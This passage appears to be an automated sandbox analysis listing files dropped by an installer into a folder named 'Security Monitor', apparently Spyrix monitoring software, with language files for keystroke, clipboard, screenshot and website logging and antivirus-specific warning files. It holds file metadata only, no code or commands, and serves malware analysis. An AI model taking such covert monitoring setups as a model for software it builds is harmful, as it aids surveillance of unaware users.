dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\id.cmd (copy)
|
DOS batch file, ASCII text, with CRLF line terminators
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\is-1I5NJ.tmp
|
PE32 executable (DLL) (console) Intel 80386, for MS Windows
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\is-24VMR.tmp
|
PE32 executable (DLL) (console) Intel 80386, for MS Windows
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\is-3CHVB.tmp
|
MS Windows icon resource - 1 icon, 16x16, 32 bits/pixel
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\is-67IFD.tmp
|
PE32 executable (console) Intel 80386 (stripped to external PDB), for MS Windows
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\is-6RR4V.tmp
|
ASCII text, with CRLF line terminators
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\is-719F1.tmp
|
PE32 executable (GUI) Intel 80386, for MS Windows
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\is-7GR0S.tmp
|
ASCII text, with very long lines (382), with CRLF line terminators
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\is-7P6I2.tmp
|
MS Windows 95 Internet shortcut text (URL=<"https://www.spyrix.com/purchase.php?from=sfk_uninstall">), ASCII text, with CRLF
line terminators
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\is-9U2JI.tmp
|
PE32 executable (GUI) Intel 80386, for MS Windows
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\is-BAID0.tmp
|
MS Windows 95 Internet shortcut text (URL=<"http://www.spyrix.com/spyrix-products.php?from=sfk_install">), ASCII text, with
CRLF line terminators
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\is-DIATA.tmp
|
MS Windows icon resource - 7 icons, 256x256 with PNG image data, 256 x 256, 8-bit/color RGBA, non-interlaced, 32 bits/pixel,
-128x-128, 32 bits/pixel
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\is-DLB82.tmp
|
PNG image data, 197 x 285, 8-bit/color RGBA, non-interlaced
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\is-E4AAL.tmp
|
JPEG image data, JFIF standard 1.01, resolution (DPI), density 96x96, segment length 16, Exif Standard: [TIFF image data,
big-endian, direntries=7, xresolution=98, yresolution=106, resolutionunit=2, software=paint.net 4.0.10], baseline, precision
8, 320x240, components 3
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\is-EO3DV.tmp
|
PE32 executable (GUI) Intel 80386, for MS Windows
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\is-G06CG.tmp
|
ASCII text, with CRLF line terminators
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\is-GD8FS.tmp
|
PE32 executable (console) Intel 80386 (stripped to external PDB), for MS Windows
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\is-H780M.tmp
|
PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\is-HNNTE.tmp
|
PE32 executable (DLL) (console) Intel 80386, for MS Windows
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\is-JLPKJ.tmp
|
PE32 executable (console) Intel 80386 (stripped to external PDB), for MS Windows
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\is-JVHDE.tmp
|
PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\is-LIV1O.tmp
|
MS Windows 95 Internet shortcut text (URL=<"https://dashboard.spyrix.com">), ASCII text, with CRLF line terminators
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\is-NNSLF.tmp
|
PE32 executable (GUI) Intel 80386, for MS Windows
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\is-PIGO0.tmp
|
ASCII text, with CRLF line terminators
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\is-Q3LI9.tmp
|
PC bitmap, Windows 3.x format, 48 x 48 x 24, resolution 2835 x 2835 px/m, cbSize 6966, bits offset 54
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\is-TEJTU.tmp
|
DOS batch file, ASCII text, with CRLF line terminators
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lame_enc.dll (copy)
|
PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\libeay32.dll (copy)
|
PE32 executable (DLL) (console) Intel 80386, for MS Windows
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\arabic.lng (copy)
|
Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\arabic\SN.rtf (copy)
|
Rich Text Format data, version 1, ANSI, code page 1252, default middle east language ID 1025
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\arabic\activity.rtf (copy)
|
Rich Text Format data, version 1, ANSI, code page 1252, default middle east language ID 1025
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\arabic\alarms.rtf (copy)
|
Rich Text Format data, version 1, ANSI, code page 1252, default middle east language ID 1025
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\arabic\clipboard.rtf (copy)
|
Rich Text Format data, version 1, ANSI, code page 1251, default middle east language ID 1025
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\arabic\delivery.rtf (copy)
|
Rich Text Format data, version 1, ANSI, code page 1251, default middle east language ID 1025
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\arabic\is-720Q2.tmp
|
Rich Text Format data, version 1, ANSI, code page 1252, default middle east language ID 1025
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\arabic\is-ACG6U.tmp
|
Rich Text Format data, version 1, ANSI, code page 1252, default middle east language ID 1025
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\arabic\is-AH45L.tmp
|
Rich Text Format data, version 1, ANSI, code page 1251, default middle east language ID 1025
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\arabic\is-GBV95.tmp
|
Rich Text Format data, version 1, ANSI, code page 1251, default middle east language ID 1025
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\arabic\is-HJJQD.tmp
|
Rich Text Format data, version 1, ANSI, code page 1252, default middle east language ID 1025
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\arabic\is-J6MD8.tmp
|
Rich Text Format data, version 1, ANSI, code page 1252, default middle east language ID 1025
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\arabic\is-KA2FL.tmp
|
Rich Text Format data, version 1, ANSI, code page 1252, default middle east language ID 1025
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\arabic\is-M105C.tmp
|
Rich Text Format data, version 1, ANSI, code page 1252, default middle east language ID 1025
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\arabic\is-PIE2I.tmp
|
Rich Text Format data, version 1, ANSI, code page 1252, default middle east language ID 1025
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\arabic\is-PVRKU.tmp
|
Rich Text Format data, version 1, ANSI, code page 1252, default middle east language ID 1025
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\arabic\is-QQI5E.tmp
|
Rich Text Format data, version 1, ANSI, code page 1252, default middle east language ID 1025
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\arabic\is-QRF0E.tmp
|
Rich Text Format data, version 1, ANSI, code page 1252, default middle east language ID 1025
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\arabic\is-R22GO.tmp
|
Rich Text Format data, version 1, ANSI, code page 1251, default middle east language ID 1025
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\arabic\is-S7MME.tmp
|
Rich Text Format data, version 1, ANSI, code page 1252, default middle east language ID 1025
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\arabic\is-TP91V.tmp
|
Rich Text Format data, version 1, ANSI, code page 1252, default middle east language ID 1025
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\arabic\is-UJC8G.tmp
|
Rich Text Format data, version 1, ANSI, code page 1251, default middle east language ID 1025
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\arabic\is-VG6LT.tmp
|
Rich Text Format data, version 1, ANSI, code page 1251, default middle east language ID 1025
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\arabic\keyboard.rtf (copy)
|
Rich Text Format data, version 1, ANSI, code page 1252, default middle east language ID 1025
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\arabic\logging.rtf (copy)
|
Rich Text Format data, version 1, ANSI, code page 1252, default middle east language ID 1025
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\arabic\noPRO.rtf (copy)
|
Rich Text Format data, version 1, ANSI, code page 1251, default middle east language ID 1025
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\arabic\noURL.rtf (copy)
|
Rich Text Format data, version 1, ANSI, code page 1251, default middle east language ID 1025
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\arabic\scheduler.rtf (copy)
|
Rich Text Format data, version 1, ANSI, code page 1252, default middle east language ID 1025
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\arabic\screenshot.rtf (copy)
|
Rich Text Format data, version 1, ANSI, code page 1252, default middle east language ID 1025
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\arabic\settings.rtf (copy)
|
Rich Text Format data, version 1, ANSI, code page 1252, default middle east language ID 1025
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\arabic\siteblock.rtf (copy)
|
Rich Text Format data, version 1, ANSI, code page 1252, default middle east language ID 1025
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\arabic\snapshot.rtf (copy)
|
Rich Text Format data, version 1, ANSI, code page 1252, default middle east language ID 1025
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\arabic\sound.rtf (copy)
|
Rich Text Format data, version 1, ANSI, code page 1252, default middle east language ID 1025
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\arabic\video.rtf (copy)
|
Rich Text Format data, version 1, ANSI, code page 1252, default middle east language ID 1025
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\arabic\websites.rtf (copy)
|
Rich Text Format data, version 1, ANSI, code page 1251, default middle east language ID 1025
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\chinese.lng (copy)
|
Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\chinese\SN.rtf (copy)
|
Rich Text Format data, version 1, ANSI, code page 1251, default middle east language ID 1025
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\chinese\activity.rtf (copy)
|
Rich Text Format data, version 1, ANSI, code page 1251, default middle east language ID 1025
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\chinese\alarms.rtf (copy)
|
Rich Text Format data, version 1, ANSI, code page 1251, default middle east language ID 1025
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\chinese\clipboard.rtf (copy)
|
Rich Text Format data, version 1, ANSI, code page 1251, default middle east language ID 1025
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\chinese\delivery.rtf (copy)
|
Rich Text Format data, version 1, ANSI, code page 1251, default middle east language ID 1025
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\chinese\is-0BOKU.tmp
|
Rich Text Format data, version 1, ANSI, code page 1251, default middle east language ID 1025
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\chinese\is-0SQMV.tmp
|
Rich Text Format data, version 1, ANSI, code page 1251, default middle east language ID 1025
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\chinese\is-3DBI9.tmp
|
Rich Text Format data, version 1, ANSI, code page 1251, default middle east language ID 1025
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\chinese\is-4RJAB.tmp
|
Rich Text Format data, version 1, ANSI, code page 1251, default middle east language ID 1025
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\chinese\is-6Q94L.tmp
|
Rich Text Format data, version 1, ANSI, code page 1251, default middle east language ID 1025
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\chinese\is-95QQQ.tmp
|
Rich Text Format data, version 1, ANSI, code page 1251, default middle east language ID 1025
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\chinese\is-A4C13.tmp
|
Rich Text Format data, version 1, ANSI, code page 1251, default middle east language ID 1025
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\chinese\is-AAUJ9.tmp
|
Rich Text Format data, version 1, ANSI, code page 1251, default middle east language ID 1025
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\chinese\is-AOHKI.tmp
|
Rich Text Format data, version 1, ANSI, code page 1251, default middle east language ID 1025
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\chinese\is-ENNH9.tmp
|
Rich Text Format data, version 1, ANSI, code page 1251, default middle east language ID 1025
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\chinese\is-IHGP9.tmp
|
Rich Text Format data, version 1, ANSI, code page 1251, default middle east language ID 1025
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\chinese\is-J3QUS.tmp
|
Rich Text Format data, version 1, ANSI, code page 1251, default middle east language ID 1025
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\chinese\is-O0VLJ.tmp
|
Rich Text Format data, version 1, ANSI, code page 1251, default middle east language ID 1025
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\chinese\is-OCVN6.tmp
|
Rich Text Format data, version 1, ANSI, code page 1251, default middle east language ID 1025
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\chinese\is-QVVKA.tmp
|
Rich Text Format data, version 1, ANSI, code page 1251, default middle east language ID 1025
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\chinese\is-RAUGO.tmp
|
Rich Text Format data, version 1, ANSI, code page 1251, default middle east language ID 1025
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\chinese\is-RUEHO.tmp
|
Rich Text Format data, version 1, ANSI, code page 1251, default middle east language ID 1025
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\chinese\keyboard.rtf (copy)
|
Rich Text Format data, version 1, ANSI, code page 1251, default middle east language ID 1025
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\chinese\logging.rtf (copy)
|
Rich Text Format data, version 1, ANSI, code page 1251, default middle east language ID 1025
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\chinese\noPRO.rtf (copy)
|
Rich Text Format data, version 1, ANSI, code page 1251, default middle east language ID 1025
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\chinese\noURL.rtf (copy)
|
Rich Text Format data, version 1, ANSI, code page 1251, default middle east language ID 1025
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\chinese\scheduler.rtf (copy)
|
Rich Text Format data, version 1, ANSI, code page 1251, default middle east language ID 1025
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\chinese\screenshot.rtf (copy)
|
Rich Text Format data, version 1, ANSI, code page 1251, default middle east language ID 1025
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\chinese\settings.rtf (copy)
|
Rich Text Format data, version 1, ANSI, code page 1251, default middle east language ID 1025
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\chinese\siteblock.rtf (copy)
|
Rich Text Format data, version 1, ANSI, code page 1251, default middle east language ID 1025
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\chinese\snapshot.rtf (copy)
|
Rich Text Format data, version 1, ANSI, code page 1251, default middle east language ID 1025
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\chinese\sound.rtf (copy)
|
Rich Text Format data, version 1, ANSI, code page 1251, default middle east language ID 1025
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\chinese\video.rtf (copy)
|
Rich Text Format data, version 1, ANSI, code page 1251, default middle east language ID 1025
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\chinese\websites.rtf (copy)
|
Rich Text Format data, version 1, ANSI, code page 1251, default middle east language ID 1025
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\english.lng (copy)
|
ASCII text, with CRLF line terminators
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\english\360_warning.rtf (copy)
|
Rich Text Format data, version 1, ANSI, code page 1251, default middle east language ID 1025
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\english\AVG_warning.rtf (copy)
|
Rich Text Format data, version 1, ANSI, code page 1251, default middle east language ID 1025
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\english\Avast_warning.rtf (copy)
|
Rich Text Format data, version 1, ANSI, code page 1251, default middle east language ID 1025
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\english\Avira_warning.rtf (copy)
|
Rich Text Format data, version 1, ANSI, code page 1251, default middle east language ID 1025
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\english\Kaspersky_warning.rtf (copy)
|
Rich Text Format data, version 1, ANSI, code page 1251, default middle east language ID 1025
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\english\McAfee_warning.rtf (copy)
|
Rich Text Format data, version 1, ANSI, code page 1251, default middle east language ID 1025
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\english\SN.rtf (copy)
|
Rich Text Format data, version 1, ANSI, code page 1251, default middle east language ID 1025
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\english\activity.rtf (copy)
|
Rich Text Format data, version 1, ANSI, code page 1251, default middle east language ID 1025
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\english\alarms.rtf (copy)
|
Rich Text Format data, version 1, ANSI, code page 1251, default middle east language ID 1025
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\english\clipboard.rtf (copy)
|
Rich Text Format data, version 1, ANSI, code page 1251, default middle east language ID 1025
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\english\delivery.rtf (copy)
|
Rich Text Format data, version 1, ANSI, code page 1251, default middle east language ID 1025
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\english\eset_warning.rtf (copy)
|
Rich Text Format data, version 1, ANSI, code page 1251, default middle east language ID 1025
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\english\is-01IDQ.tmp
|
Rich Text Format data, version 1, ANSI, code page 1251, default middle east language ID 1025
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\english\is-065KQ.tmp
|
Rich Text Format data, version 1, ANSI, code page 1251, default middle east language ID 1025
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\english\is-08MQF.tmp
|
Rich Text Format data, version 1, ANSI, code page 1251, default middle east language ID 1025
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\english\is-0CK62.tmp
|
Rich Text Format data, version 1, ANSI, code page 1251, default middle east language ID 1025
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\english\is-1I8EP.tmp
|
Rich Text Format data, version 1, ANSI, code page 1251, default middle east language ID 1025
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\english\is-42CJH.tmp
|
Rich Text Format data, version 1, ANSI, code page 1251, default middle east language ID 1025
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\english\is-642F2.tmp
|
Rich Text Format data, version 1, ANSI, code page 1251, default middle east language ID 1025
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\english\is-9JH0K.tmp
|
Rich Text Format data, version 1, ANSI, code page 1251, default middle east language ID 1025
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\english\is-BBT1L.tmp
|
Rich Text Format data, version 1, ANSI, code page 1251, default middle east language ID 1025
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\english\is-BSI65.tmp
|
Rich Text Format data, version 1, ANSI, code page 1251, default middle east language ID 1025
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\english\is-D2P5E.tmp
|
Rich Text Format data, version 1, ANSI, code page 1251, default middle east language ID 1025
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\english\is-E2TEI.tmp
|
Rich Text Format data, version 1, ANSI, code page 1251, default middle east language ID 1025
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\english\is-HUSE3.tmp
|
Rich Text Format data, version 1, ANSI, code page 1251, default middle east language ID 1025
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\english\is-JJ2T4.tmp
|
Rich Text Format data, version 1, ANSI, code page 1251, default middle east language ID 1025
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\english\is-LG5KD.tmp
|
Rich Text Format data, version 1, ANSI, code page 1251, default middle east language ID 1025
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\english\is-M20SH.tmp
|
Rich Text Format data, version 1, ANSI, code page 1251, default middle east language ID 1025
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\english\is-OJ58C.tmp
|
Rich Text Format data, version 1, ANSI, code page 1251, default middle east language ID 1025
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\english\is-OP3RK.tmp
|
Rich Text Format data, version 1, ANSI, code page 1251, default middle east language ID 1025
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\english\is-SFHSQ.tmp
|
Rich Text Format data, version 1, ANSI, code page 1251, default middle east language ID 1025
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\english\is-SGNRO.tmp
|
Rich Text Format data, version 1, ANSI, code page 1251, default middle east language ID 1025
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\english\is-SHQC5.tmp
|
Rich Text Format data, version 1, ANSI, code page 1251, default middle east language ID 1025
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\english\is-T2L17.tmp
|
Rich Text Format data, version 1, ANSI, code page 1251, default middle east language ID 1025
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\english\is-T6LGH.tmp
|
Rich Text Format data, version 1, ANSI, code page 1251, default middle east language ID 1025
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\english\is-UJP2L.tmp
|
Rich Text Format data, version 1, ANSI, code page 1251, default middle east language ID 1025
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\english\is-V6A58.tmp
|
Rich Text Format data, version 1, ANSI, code page 1251, default middle east language ID 1025
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\english\keyboard.rtf (copy)
|
Rich Text Format data, version 1, ANSI, code page 1251, default middle east language ID 1025
|
dropped
|
||
